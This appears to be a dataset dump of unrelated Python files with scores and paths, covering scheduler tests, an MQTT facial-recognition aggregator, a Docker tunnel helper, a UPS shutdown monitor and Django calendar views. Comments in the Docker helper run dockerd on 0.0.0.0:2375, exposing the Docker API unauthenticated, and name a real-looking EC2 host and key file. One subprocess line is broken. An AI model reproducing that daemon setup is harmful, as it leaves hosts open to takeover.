new_mk[:, :, 1][new_mk[:, :, 1] == 3] = 255 # Glands : Green color
new_mk[:, :, 2][new_mk[:, :, 2] == 3] = 0 # Glands : Green color
#new_mk = new_mk/255.0
#plt.imshow(new_mk)
#plt.show()
print(mask_name)
image.save_img(os.path.join(outfolder,mask_name),new_mk)
#image.save_img(os.path.join(outfolder_images,img_name),img)
for path in masks_paths:
if("neg" in path):
print(path)
extract_image(path) | 0.206094 | 0.441492 |
from datetime import datetime, timedelta
from rx.concurrency import Scheduler, CurrentThreadScheduler
def test_currentthread_now():
res = Scheduler.now() - datetime.utcnow()
assert res < timedelta(milliseconds=1000)
def test_currentthread_scheduleaction():
scheduler = CurrentThreadScheduler()
ran = False
def action(scheduler, state=None):
nonlocal ran
ran = True
scheduler.schedule(action)
assert ran == True
def test_currentthread_scheduleactionerror():
scheduler = CurrentThreadScheduler()
class MyException(Exception):
pass
def action(scheduler, state=None):
raise MyException()
try:
return scheduler.schedule(action)
except MyException:
assert True
def test_currentthread_scheduleactionnested():
scheduler = CurrentThreadScheduler()
ran = False
def action(scheduler, state=None):
def inner_action(scheduler, state=None):
nonlocal ran
ran = True
return scheduler.schedule(inner_action)
scheduler.schedule(action)
assert ran == True
def test_currentthread_ensuretrampoline():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduer, state=None):
def action1(scheduler, state=None):
nonlocal ran1
ran1 = True
scheduler.schedule(action1)
def action2(scheduler, state=None):
nonlocal ran2
ran2 = True
return scheduler.schedule(action2)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == True
def test_currentthread_ensuretrampoline_nested():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
scheduler.ensure_trampoline(inner_action1)
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
return scheduler.ensure_trampoline(inner_action2)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == True
def test_currentthread_ensuretrampoline_and_cancel():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
d = scheduler.schedule(inner_action2)
d.dispose()
return scheduler.schedule(inner_action1)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == False
def test_currentthread_ensuretrampoline_and_canceltimed():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
d = scheduler.schedule_relative(timedelta(milliseconds=500), inner_action2)
d.dispose()
return scheduler.schedule(inner_action1)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == False | tests/test_currentthreadscheduler.py | from datetime import datetime, timedelta
from rx.concurrency import Scheduler, CurrentThreadScheduler
def test_currentthread_now():
res = Scheduler.now() - datetime.utcnow()
assert res < timedelta(milliseconds=1000)
def test_currentthread_scheduleaction():
scheduler = CurrentThreadScheduler()
ran = False
def action(scheduler, state=None):
nonlocal ran
ran = True
scheduler.schedule(action)
assert ran == True
def test_currentthread_scheduleactionerror():
scheduler = CurrentThreadScheduler()
class MyException(Exception):
pass
def action(scheduler, state=None):
raise MyException()
try:
return scheduler.schedule(action)
except MyException:
assert True
def test_currentthread_scheduleactionnested():
scheduler = CurrentThreadScheduler()
ran = False
def action(scheduler, state=None):
def inner_action(scheduler, state=None):
nonlocal ran
ran = True
return scheduler.schedule(inner_action)
scheduler.schedule(action)
assert ran == True
def test_currentthread_ensuretrampoline():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduer, state=None):
def action1(scheduler, state=None):
nonlocal ran1
ran1 = True
scheduler.schedule(action1)
def action2(scheduler, state=None):
nonlocal ran2
ran2 = True
return scheduler.schedule(action2)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == True
def test_currentthread_ensuretrampoline_nested():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
scheduler.ensure_trampoline(inner_action1)
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
return scheduler.ensure_trampoline(inner_action2)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == True
def test_currentthread_ensuretrampoline_and_cancel():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
d = scheduler.schedule(inner_action2)
d.dispose()
return scheduler.schedule(inner_action1)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == False
def test_currentthread_ensuretrampoline_and_canceltimed():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
d = scheduler.schedule_relative(timedelta(milliseconds=500), inner_action2)
d.dispose()
return scheduler.schedule(inner_action1)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == False | 0.639849 | 0.410756 |
import argparse
import json
import mqttClient as mqc
import time
def on_login(users):
convertedUsers = []
for user in users:
loggedInUser = loggedInUsers.get(user)
if loggedInUser is None:
loggedInUser = {"count":0,"ids":[]}
convertedUsers.append(user)
loggedInUser["count"] = loggedInUser["count"] + 1;
loggedInUsers[user] = loggedInUser
print("User:", user, "count:", loggedInUser["count"])
if convertedUsers:
print("New login users:", convertedUsers)
message = {"action":"login", "message":{"users":convertedUsers}}
mqttClient.publish(args["mqttTopic"], json.dumps(message))
def on_logout(users):
convertedUsers = []
for user in users:
loggedInUser = loggedInUsers.get(user)
if loggedInUser is not None:
loggedInUser["count"] = loggedInUser["count"] - 1;
print("User:", user, "count:", loggedInUser["count"])
if loggedInUser["count"] <= 0:
del loggedInUsers[user]
convertedUsers.append(user)
else:
loggedInUsers[user] = loggedInUser
if convertedUsers:
print("New logout users:", convertedUsers)
message = {"action":"logout", "message":{"users":convertedUsers}}
mqttClient.publish(args["mqttTopic"], json.dumps(message))
def on_message_msgs(mosq, obj, msg):
# TODO: Parse out json
# Add camera identifier to json?
# Add to Login list if login
# Remove count from login list if logout
jsonMessage = json.loads(msg.payload)
action = jsonMessage["action"]
print("Action: " + action)
if(action == "login"):
on_login(jsonMessage["message"]["users"])
elif(action == "logout"):
on_logout(jsonMessage["message"]["users"])
print("Started")
loggedInUsers = {}
ap = argparse.ArgumentParser()
ap.add_argument("-mqh", "--mqttHost", type=str, required=False, default="eclipse-mosquitto",
help="MQTT server address or IP")
ap.add_argument("-mqp", "--mqttPort", type=int, required=False, default=1883,
help="MQTT server Port")
ap.add_argument("-mqt", "--mqttTopic", type=str, required=False, default="facialrecognition/converted",
help="MQTT topic to publish messages to")
ap.add_argument("-mqts", "--mqttTopicSub", type=str, required=False, default="facialrecognition/raw",
help="MQTT topic to publish messages to")
# TODO: Add generic MQTT options param in json form to support ssl certs/self signed certs
args = vars(ap.parse_args())
mqttClient = mqc.Client("converter-facial-rec", clean_session=False)
mqttClient.message_callback_add(args["mqttTopicSub"], on_message_msgs)
mqttClient.subscribe(args["mqttTopicSub"])
print("Connecting to mqtt client {}:{}".format(args["mqttHost"], args["mqttPort"]))
mqttClient.start_forever(args["mqttHost"], args["mqttPort"]) | tools/mqttMessageAggregator.py | import argparse
import json
import mqttClient as mqc
import time
def on_login(users):
convertedUsers = []
for user in users:
loggedInUser = loggedInUsers.get(user)
if loggedInUser is None:
loggedInUser = {"count":0,"ids":[]}
convertedUsers.append(user)
loggedInUser["count"] = loggedInUser["count"] + 1;
loggedInUsers[user] = loggedInUser
print("User:", user, "count:", loggedInUser["count"])
if convertedUsers:
print("New login users:", convertedUsers)
message = {"action":"login", "message":{"users":convertedUsers}}
mqttClient.publish(args["mqttTopic"], json.dumps(message))
def on_logout(users):
convertedUsers = []
for user in users:
loggedInUser = loggedInUsers.get(user)
if loggedInUser is not None:
loggedInUser["count"] = loggedInUser["count"] - 1;
print("User:", user, "count:", loggedInUser["count"])
if loggedInUser["count"] <= 0:
del loggedInUsers[user]
convertedUsers.append(user)
else:
loggedInUsers[user] = loggedInUser
if convertedUsers:
print("New logout users:", convertedUsers)
message = {"action":"logout", "message":{"users":convertedUsers}}
mqttClient.publish(args["mqttTopic"], json.dumps(message))
def on_message_msgs(mosq, obj, msg):
# TODO: Parse out json
# Add camera identifier to json?
# Add to Login list if login
# Remove count from login list if logout
jsonMessage = json.loads(msg.payload)
action = jsonMessage["action"]
print("Action: " + action)
if(action == "login"):
on_login(jsonMessage["message"]["users"])
elif(action == "logout"):
on_logout(jsonMessage["message"]["users"])
print("Started")
loggedInUsers = {}
ap = argparse.ArgumentParser()
ap.add_argument("-mqh", "--mqttHost", type=str, required=False, default="eclipse-mosquitto",
help="MQTT server address or IP")
ap.add_argument("-mqp", "--mqttPort", type=int, required=False, default=1883,
help="MQTT server Port")
ap.add_argument("-mqt", "--mqttTopic", type=str, required=False, default="facialrecognition/converted",
help="MQTT topic to publish messages to")
ap.add_argument("-mqts", "--mqttTopicSub", type=str, required=False, default="facialrecognition/raw",
help="MQTT topic to publish messages to")
# TODO: Add generic MQTT options param in json form to support ssl certs/self signed certs
args = vars(ap.parse_args())
mqttClient = mqc.Client("converter-facial-rec", clean_session=False)
mqttClient.message_callback_add(args["mqttTopicSub"], on_message_msgs)
mqttClient.subscribe(args["mqttTopicSub"])
print("Connecting to mqtt client {}:{}".format(args["mqttHost"], args["mqttPort"]))
mqttClient.start_forever(args["mqttHost"], args["mqttPort"]) | 0.106667 | 0.050191 |
import docker
import subprocess
import time
from app.config_const import *
#SETUP sul SERVER DOCKER:
# rimuovi il docker pid: sudo rm /var/run/docker.pid
# stoppa il servizio docker: sudo systemctl stop docker
# starta il demone docker sulla tua porta: sudo dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
#Comando da dare in caso si voglia fare una macchina docker
#sudo rm /var/run/docker.pid && sudo systemctl stop docker && sudo dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
#client = docker.DockerClient(base_url='tcp://127.0.0.1:7000')
ports_dict = {'80/tcp': 123}
#docker run -d -p 123:80 giussorama/repo:latest
#lab_started = client.containers.run("giussorama/repo:latest", detach=True, name="lab1", auto_remove=True, ports=ports_dict)
#print(lab_started)
# ssh -i "challange.pem" ubuntu@ec2-52-3-245-151.compute-1.amazonaws.com -Nf -L 7000:127.0.0.1:2375
# -Nf = in background e senza interattività
def get_docker_client(url_server_docker, low=False):
#Comando per controllare se la porta in questione è usata
cmd_check_tunnel = "nc -z localhost "+str(LOCAL_PORT)+" || echo \"no tunnel open\""
#Provo a prendere il client
try:
result = subprocess.check_output(cmd_check_tunnel, shell=True)
#print("\n\n\nResult of tunnel-> "+ str(result) + " \n\n\n")
if "no tunnel open" in str(result): #vuol dire che ha stampato "no tunnel open"
#print("non c'è il tunnel")
#print("\n\nIl Tunnel non c'è")
raise Exception("Il Tunnel non c'è")
else:
#print("\n\nil tunnell c'è ->"+str(result))
pass
if low == False:
client = docker.DockerClient(base_url=url_server_docker)
else:
client = docker.APIClient(base_url=url_server_docker)
except Exception as e:
print("\n\n\n Excepted ("+str(e.args)+")\n\n\n")
#Impossibile trovare l'API Docker su questo indirizzo
#Facciamo il set up del tunnel ssh
#Comando: ssh -i "challange.pem" ubuntu@ec2-52-3-245-151.compute-1.amazonaws.com -Nf -L 7000:127.0.0.1:2375
cmd = "ssh -i \""+FULL_PATH_SSH_KEY+"\" "+USER_SERVER+"@"+DNS_NAME_SERVER+" -Nf -L "+str(LOCAL_PORT)+":127.0.0.1:"+str(REMOTE_PORT)
result = subprocess.check_output(cmd, shell=True)
time.sleep(1) # Aspettiamo 1 secondo per fare in modo che il tunnel SSH sia attivo
#Riproviamo a prendere il client
try:
result = subprocess.check_output(result = subprocess.check_output(cmd_check_tunnel, shell=True), shell=True)
if len(str(result)) > 5: #vuol dire che ha stampato "no tunnel open"
#print("non c'è il tunnel")
print("\n\nImpossibile stabilire il tunnel ssh, non è possibile comunicare con la macchina docker")
raise Exception("Impossibile stabilire il tunnel ssh, non è possibile comunicare con la macchina docker")
else:
print("\n\nil tunnell c'è")
pass
if low == False:
client = docker.DockerClient(base_url=url_server_docker)
else:
client = docker.APIClient(base_url=url_server_docker)
except:
raise Exception('Errore', 'Impossibile creare il client con l\'url specificato')
return client | app/setup_docker_client.py | import docker
import subprocess
import time
from app.config_const import *
#SETUP sul SERVER DOCKER:
# rimuovi il docker pid: sudo rm /var/run/docker.pid
# stoppa il servizio docker: sudo systemctl stop docker
# starta il demone docker sulla tua porta: sudo dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
#Comando da dare in caso si voglia fare una macchina docker
#sudo rm /var/run/docker.pid && sudo systemctl stop docker && sudo dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
#client = docker.DockerClient(base_url='tcp://127.0.0.1:7000')
ports_dict = {'80/tcp': 123}
#docker run -d -p 123:80 giussorama/repo:latest
#lab_started = client.containers.run("giussorama/repo:latest", detach=True, name="lab1", auto_remove=True, ports=ports_dict)
#print(lab_started)
# ssh -i "challange.pem" ubuntu@ec2-52-3-245-151.compute-1.amazonaws.com -Nf -L 7000:127.0.0.1:2375
# -Nf = in background e senza interattività
def get_docker_client(url_server_docker, low=False):
#Comando per controllare se la porta in questione è usata
cmd_check_tunnel = "nc -z localhost "+str(LOCAL_PORT)+" || echo \"no tunnel open\""
#Provo a prendere il client
try:
result = subprocess.check_output(cmd_check_tunnel, shell=True)
#print("\n\n\nResult of tunnel-> "+ str(result) + " \n\n\n")
if "no tunnel open" in str(result): #vuol dire che ha stampato "no tunnel open"
#print("non c'è il tunnel")
#print("\n\nIl Tunnel non c'è")
raise Exception("Il Tunnel non c'è")
else:
#print("\n\nil tunnell c'è ->"+str(result))
pass
if low == False:
client = docker.DockerClient(base_url=url_server_docker)
else:
client = docker.APIClient(base_url=url_server_docker)
except Exception as e:
print("\n\n\n Excepted ("+str(e.args)+")\n\n\n")
#Impossibile trovare l'API Docker su questo indirizzo
#Facciamo il set up del tunnel ssh
#Comando: ssh -i "challange.pem" ubuntu@ec2-52-3-245-151.compute-1.amazonaws.com -Nf -L 7000:127.0.0.1:2375
cmd = "ssh -i \""+FULL_PATH_SSH_KEY+"\" "+USER_SERVER+"@"+DNS_NAME_SERVER+" -Nf -L "+str(LOCAL_PORT)+":127.0.0.1:"+str(REMOTE_PORT)
result = subprocess.check_output(cmd, shell=True)
time.sleep(1) # Aspettiamo 1 secondo per fare in modo che il tunnel SSH sia attivo
#Riproviamo a prendere il client
try:
result = subprocess.check_output(result = subprocess.check_output(cmd_check_tunnel, shell=True), shell=True)
if len(str(result)) > 5: #vuol dire che ha stampato "no tunnel open"
#print("non c'è il tunnel")
print("\n\nImpossibile stabilire il tunnel ssh, non è possibile comunicare con la macchina docker")
raise Exception("Impossibile stabilire il tunnel ssh, non è possibile comunicare con la macchina docker")
else:
print("\n\nil tunnell c'è")
pass
if low == False:
client = docker.DockerClient(base_url=url_server_docker)
else:
client = docker.APIClient(base_url=url_server_docker)
except:
raise Exception('Errore', 'Impossibile creare il client con l\'url specificato')
return client | 0.047459 | 0.061115 |
import RPi.GPIO as GPIO
import os
import time
from datetime import datetime
GPIO.setmode(GPIO.BCM)
#do not use
#PIN_FACTORY_RESET_17 = 17 # factory reset
#PIN_UPS_PICO_1 = 27
#PIN_UPS_PICO_2 = 22
PIN_COM = 25
PIN_POWER_PRESENT = 22
#GPIO_10 True if SpectrooUPS installed
PIN_ID=10
GPIO.setwarnings(False)
GPIO.setup(PIN_POWER_PRESENT, GPIO.IN)
GPIO.setup(PIN_COM, GPIO.IN)
GPIO.setup(PIN_ID, GPIO.IN)
IS_UPS_INSTALLED=False
IS_SHUTDOWN_REQUIRED=False
TS_NOPOWER=None
print "Searching for Spectroo UPS..."
while(True):
GPIO.setup(PIN_COM, GPIO.IN)
PIN_COM_VALUE = GPIO.input(PIN_COM)
PIN_ID_VALUE = GPIO.input(PIN_ID)
#send 100ms 0 to UPS #watchdog
GPIO.setup(PIN_COM, GPIO.OUT)
GPIO.output(PIN_COM,False)
time.sleep(0.1)
if IS_UPS_INSTALLED == True and PIN_ID_VALUE == False:
IS_UPS_INSTALLED=False
print "Spectroo UPS disconected."
if PIN_ID_VALUE == False:
#sleep 5 seconds if UPS is not detected
time.sleep(5)
continue
if IS_UPS_INSTALLED == False and PIN_ID_VALUE == True:
IS_UPS_INSTALLED=True
print "Spectroo UPS detected."
if IS_UPS_INSTALLED == True and PIN_COM_VALUE == False:
IS_SHUTDOWN_REQUIRED=True
IS_POWER_PRESENT_VALUE = GPIO.input(PIN_POWER_PRESENT)
if IS_UPS_INSTALLED == True and IS_POWER_PRESENT_VALUE == False:
if TS_NOPOWER is None:
TS_NOPOWER=datetime.now()
else:
try:
diff = (datetime.now() - TS_NOPOWER)
diff = diff.total_seconds()
if diff > 20:
IS_SHUTDOWN_REQUIRED=True
print "Power not present for more than 20 seconds ... shutdown flag true"
except:
pass
else:
TS_NOPOWER=None
IS_SHUTDOWN_REQUIRED=False
#test id shutdown is notified by ups
GPIO.setup(PIN_COM, GPIO.IN)
time.sleep(0.2)
PIN_COM_VALUE = GPIO.input(PIN_COM)
if PIN_COM_VALUE == False:
IS_SHUTDOWN_REQUIRED=True
print "Shutdown required by UPS."
if IS_UPS_INSTALLED == True and IS_SHUTDOWN_REQUIRED == True and IS_POWER_PRESENT_VALUE == False:
print "Shutdown procedure started.."
os.system("shutdown -h now")
time.sleep(15) | spectroo_ups.py | import RPi.GPIO as GPIO
import os
import time
from datetime import datetime
GPIO.setmode(GPIO.BCM)
#do not use
#PIN_FACTORY_RESET_17 = 17 # factory reset
#PIN_UPS_PICO_1 = 27
#PIN_UPS_PICO_2 = 22
PIN_COM = 25
PIN_POWER_PRESENT = 22
#GPIO_10 True if SpectrooUPS installed
PIN_ID=10
GPIO.setwarnings(False)
GPIO.setup(PIN_POWER_PRESENT, GPIO.IN)
GPIO.setup(PIN_COM, GPIO.IN)
GPIO.setup(PIN_ID, GPIO.IN)
IS_UPS_INSTALLED=False
IS_SHUTDOWN_REQUIRED=False
TS_NOPOWER=None
print "Searching for Spectroo UPS..."
while(True):
GPIO.setup(PIN_COM, GPIO.IN)
PIN_COM_VALUE = GPIO.input(PIN_COM)
PIN_ID_VALUE = GPIO.input(PIN_ID)
#send 100ms 0 to UPS #watchdog
GPIO.setup(PIN_COM, GPIO.OUT)
GPIO.output(PIN_COM,False)
time.sleep(0.1)
if IS_UPS_INSTALLED == True and PIN_ID_VALUE == False:
IS_UPS_INSTALLED=False
print "Spectroo UPS disconected."
if PIN_ID_VALUE == False:
#sleep 5 seconds if UPS is not detected
time.sleep(5)
continue
if IS_UPS_INSTALLED == False and PIN_ID_VALUE == True:
IS_UPS_INSTALLED=True
print "Spectroo UPS detected."
if IS_UPS_INSTALLED == True and PIN_COM_VALUE == False:
IS_SHUTDOWN_REQUIRED=True
IS_POWER_PRESENT_VALUE = GPIO.input(PIN_POWER_PRESENT)
if IS_UPS_INSTALLED == True and IS_POWER_PRESENT_VALUE == False:
if TS_NOPOWER is None:
TS_NOPOWER=datetime.now()
else:
try:
diff = (datetime.now() - TS_NOPOWER)
diff = diff.total_seconds()
if diff > 20:
IS_SHUTDOWN_REQUIRED=True
print "Power not present for more than 20 seconds ... shutdown flag true"
except:
pass
else:
TS_NOPOWER=None
IS_SHUTDOWN_REQUIRED=False
#test id shutdown is notified by ups
GPIO.setup(PIN_COM, GPIO.IN)
time.sleep(0.2)
PIN_COM_VALUE = GPIO.input(PIN_COM)
if PIN_COM_VALUE == False:
IS_SHUTDOWN_REQUIRED=True
print "Shutdown required by UPS."
if IS_UPS_INSTALLED == True and IS_SHUTDOWN_REQUIRED == True and IS_POWER_PRESENT_VALUE == False:
print "Shutdown procedure started.."
os.system("shutdown -h now")
time.sleep(15) | 0.047272 | 0.084682 |
import datetime
from typing import Dict, List, Optional
from pydantic import constr, Field, root_validator, StrictStr, validator
from aspen.api.schemas.base import BaseRequest, BaseResponse
from aspen.database.models import TreeType
# What kinds of ondemand nextstrain builds do we support?
PHYLO_TREE_TYPES = [
TreeType.OVERVIEW.value,
TreeType.NON_CONTEXTUALIZED.value,
TreeType.TARGETED.value,
]
class TemplateArgsRequest(BaseRequest):
filter_start_date: Optional[datetime.date]
filter_end_date: Optional[datetime.date]
filter_pango_lineages: Optional[List[constr(regex=r"^[0-9A-Z.]+$")]] # type: ignore # noqa
class PhyloRunRequest(BaseRequest):
# mypy + pydantic is a work in progress: https://github.com/samuelcolvin/pydantic/issues/156
name: constr(min_length=1, max_length=128, strict=True) # type: ignore
samples: List[StrictStr]
tree_type: StrictStr
template_args: Optional[TemplateArgsRequest]
@validator("tree_type")
def tree_type_must_be_supported(cls, value):
uppercase_tree_type = value.upper()
assert uppercase_tree_type in PHYLO_TREE_TYPES
return uppercase_tree_type
class GroupResponse(BaseResponse):
class Config:
orm_mode = True
id: int
name: StrictStr
location: Optional[StrictStr]
class UserResponse(BaseResponse):
id: int
name: str
class TreeResponse(BaseResponse):
id: int
name: Optional[str]
class PhyloRunResponse(BaseResponse):
class Config:
orm_mode = True
allow_population_by_field_name = True
# Return the first phylo tree output. We only expect one, and for this to
# work right, this *depends on our query filtering out other output types!*
@validator("outputs", pre=True)
def resolve_tree(cls, v):
for output in v:
return output
# Workarounds for our SQLAlchemy enums
@validator("tree_type", "workflow_status", pre=True)
def resolve_enums(cls, v):
return v.value
@root_validator(pre=False)
def _set_fields(cls, values: dict) -> dict:
if values["name"]:
return values
# Generate a nice tree name if one doesn't exist
# template_args should be transparently deserialized into a python dict.
# but if something is wrong with the data in the column (i.e. the json is
# double escaped), it will be a string instead.
location = values["group"].location
if values["outputs"]:
values["name"] = values["outputs"].name
return values
if isinstance(values["template_args"], Dict):
template_args = values["template_args"]
location = template_args.get("location", location)
values[
"name"
] = f"{location} Tree {values['start_datetime'].strftime('%Y-%m-%d')}"
return values
id: int
start_datetime: datetime.datetime
end_datetime: Optional[datetime.datetime]
workflow_status: str
template_args: Dict
name: Optional[str]
group: GroupResponse
template_file_path: Optional[StrictStr]
tree_type: Optional[str]
user: Optional[UserResponse]
# This lets us remap phlo_run.outputs to phylo_run.phylo_tree using the validator above
outputs: Optional[TreeResponse] = Field(alias="phylo_tree")
class PhyloRunDeleteResponse(BaseResponse):
id: int
class PhyloRunsListResponse(BaseResponse):
phylo_runs: List[PhyloRunResponse]
class PhyloRunUpdateRequest(BaseRequest):
name: constr(min_length=1, max_length=128, strip_whitespace=True) # type: ignore | src/backend/aspen/api/schemas/phylo_runs.py | import datetime
from typing import Dict, List, Optional
from pydantic import constr, Field, root_validator, StrictStr, validator
from aspen.api.schemas.base import BaseRequest, BaseResponse
from aspen.database.models import TreeType
# What kinds of ondemand nextstrain builds do we support?
PHYLO_TREE_TYPES = [
TreeType.OVERVIEW.value,
TreeType.NON_CONTEXTUALIZED.value,
TreeType.TARGETED.value,
]
class TemplateArgsRequest(BaseRequest):
filter_start_date: Optional[datetime.date]
filter_end_date: Optional[datetime.date]
filter_pango_lineages: Optional[List[constr(regex=r"^[0-9A-Z.]+$")]] # type: ignore # noqa
class PhyloRunRequest(BaseRequest):
# mypy + pydantic is a work in progress: https://github.com/samuelcolvin/pydantic/issues/156
name: constr(min_length=1, max_length=128, strict=True) # type: ignore
samples: List[StrictStr]
tree_type: StrictStr
template_args: Optional[TemplateArgsRequest]
@validator("tree_type")
def tree_type_must_be_supported(cls, value):
uppercase_tree_type = value.upper()
assert uppercase_tree_type in PHYLO_TREE_TYPES
return uppercase_tree_type
class GroupResponse(BaseResponse):
class Config:
orm_mode = True
id: int
name: StrictStr
location: Optional[StrictStr]
class UserResponse(BaseResponse):
id: int
name: str
class TreeResponse(BaseResponse):
id: int
name: Optional[str]
class PhyloRunResponse(BaseResponse):
class Config:
orm_mode = True
allow_population_by_field_name = True
# Return the first phylo tree output. We only expect one, and for this to
# work right, this *depends on our query filtering out other output types!*
@validator("outputs", pre=True)
def resolve_tree(cls, v):
for output in v:
return output
# Workarounds for our SQLAlchemy enums
@validator("tree_type", "workflow_status", pre=True)
def resolve_enums(cls, v):
return v.value
@root_validator(pre=False)
def _set_fields(cls, values: dict) -> dict:
if values["name"]:
return values
# Generate a nice tree name if one doesn't exist
# template_args should be transparently deserialized into a python dict.
# but if something is wrong with the data in the column (i.e. the json is
# double escaped), it will be a string instead.
location = values["group"].location
if values["outputs"]:
values["name"] = values["outputs"].name
return values
if isinstance(values["template_args"], Dict):
template_args = values["template_args"]
location = template_args.get("location", location)
values[
"name"
] = f"{location} Tree {values['start_datetime'].strftime('%Y-%m-%d')}"
return values
id: int
start_datetime: datetime.datetime
end_datetime: Optional[datetime.datetime]
workflow_status: str
template_args: Dict
name: Optional[str]
group: GroupResponse
template_file_path: Optional[StrictStr]
tree_type: Optional[str]
user: Optional[UserResponse]
# This lets us remap phlo_run.outputs to phylo_run.phylo_tree using the validator above
outputs: Optional[TreeResponse] = Field(alias="phylo_tree")
class PhyloRunDeleteResponse(BaseResponse):
id: int
class PhyloRunsListResponse(BaseResponse):
phylo_runs: List[PhyloRunResponse]
class PhyloRunUpdateRequest(BaseRequest):
name: constr(min_length=1, max_length=128, strip_whitespace=True) # type: ignore | 0.870886 | 0.323727 |
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from django.utils.tzinfo import LocalTimezone
from woodstock.models import EventPart
from woodstock import settings
import icalendar
import datetime
import random
import hashlib
def _event_part_ics(event_parts):
cal = icalendar.Calendar()
cal.add('prodid', '-//Woodstock//')
cal.add('version', '2.0')
cal.add('method', 'REQUEST')
cal.add('CALSCALE', 'GREGORIAN')
for event_part in event_parts:
event = icalendar.Event()
event.add('summary', settings.ICS_EVENT_PART_NAME % {'event_name': event_part.event.translation.name, 'part_name': event_part.name})
tz_start = LocalTimezone(event_part.date_start)
event.add('dtstart', event_part.date_start.replace(tzinfo=tz_start))
tz_end = LocalTimezone(event_part.date_end)
event.add('dtend', event_part.date_end.replace(tzinfo=tz_end))
tz_stamp = LocalTimezone(datetime.datetime.now())
event.add('dtstamp', datetime.datetime.now().replace(tzinfo=tz_stamp))
event['uid'] = '%s/%s/woodstock' % (event_part.id, hashlib.md5(str(random.random())).hexdigest()[:10])
event.add('priority', 5)
cal.add_component(event)
response = HttpResponse(cal.as_string(), mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response
def event_part_view(request, event_part_id):
event_part = get_object_or_404(EventPart, pk=event_part_id)
ics = _event_part_ics([event_part])
response = HttpResponse(ics, mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response
def event_parts_email_view(request, participant, event):
"""
This view is showed using the pennyblack proxy view.
"""
event_parts = EventPart.objects.filter(event=event, attendances__participant=participant)
ics = _event_part_ics(event_parts)
response = HttpResponse(ics, mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response | woodstock/views/ics.py | from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from django.utils.tzinfo import LocalTimezone
from woodstock.models import EventPart
from woodstock import settings
import icalendar
import datetime
import random
import hashlib
def _event_part_ics(event_parts):
cal = icalendar.Calendar()
cal.add('prodid', '-//Woodstock//')
cal.add('version', '2.0')
cal.add('method', 'REQUEST')
cal.add('CALSCALE', 'GREGORIAN')
for event_part in event_parts:
event = icalendar.Event()
event.add('summary', settings.ICS_EVENT_PART_NAME % {'event_name': event_part.event.translation.name, 'part_name': event_part.name})
tz_start = LocalTimezone(event_part.date_start)
event.add('dtstart', event_part.date_start.replace(tzinfo=tz_start))
tz_end = LocalTimezone(event_part.date_end)
event.add('dtend', event_part.date_end.replace(tzinfo=tz_end))
tz_stamp = LocalTimezone(datetime.datetime.now())
event.add('dtstamp', datetime.datetime.now().replace(tzinfo=tz_stamp))
event['uid'] = '%s/%s/woodstock' % (event_part.id, hashlib.md5(str(random.random())).hexdigest()[:10])
event.add('priority', 5)
cal.add_component(event)
response = HttpResponse(cal.as_string(), mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response
def event_part_view(request, event_part_id):
event_part = get_object_or_404(EventPart, pk=event_part_id)
ics = _event_part_ics([event_part])
response = HttpResponse(ics, mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response
def event_parts_email_view(request, participant, event):
"""
This view is showed using the pennyblack proxy view.
"""
event_parts = EventPart.objects.filter(event=event, attendances__participant=participant)
ics = _event_part_ics(event_parts)
response = HttpResponse(ics, mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response | 0.367384 | 0.089614 |
import argparse
import pandas as pd
from tqdm import tqdm
from PIL import Image
import numpy as np
from contextualized_topic_models.datasets.dataset import CTMDataset
from sklearn.metrics.pairwise import cosine_similarity
from utils import load_model
from sentence_transformers import SentenceTransformer, util
import pickle
import scipy
import numpy as np
import os
os.environ["TOKENIZERS_PARALLELISM"] = "false"
parser = argparse.ArgumentParser()
parser.add_argument("--text_model", type=str, required=True)
parser.add_argument("--image_model", type=str, required=True)
parser.add_argument("--tp", type=str, required=True)
args = parser.parse_args()
text_list = pd.read_csv(open("./Data2021/MediaEvalNewsImagesBatch04articles.tsv", "r"), sep="\t")
